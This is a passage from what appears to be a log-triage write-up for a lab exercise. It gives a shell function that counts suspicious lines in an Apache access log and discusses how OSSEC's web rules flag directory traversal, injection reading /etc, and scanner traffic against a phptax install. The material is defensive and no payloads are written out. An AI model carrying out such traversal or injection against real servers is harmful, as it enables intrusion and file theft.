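# Number of flagged lines on stdin, for quick triage.
count_noise() {
    noisy_requests | awk 'END { print NR }'
}

# Live usage on the VM (as root, or from a snapshot of the disk):
#   noisy_requests < /var/log/httpd-access.log
#   count_noise    < /var/log/httpd-access.log
```

Two lines in the sample pass untouched: the first browser hit and the plain phptax index fetch. Everything else is exactly the traffic OSSEC's default web rules key on, which is the point of loneferret's exercise: the traversal and the injection each fire once whether you read one file or the whole /etc, but the scanner run produced hundreds of 403s before any real attack started.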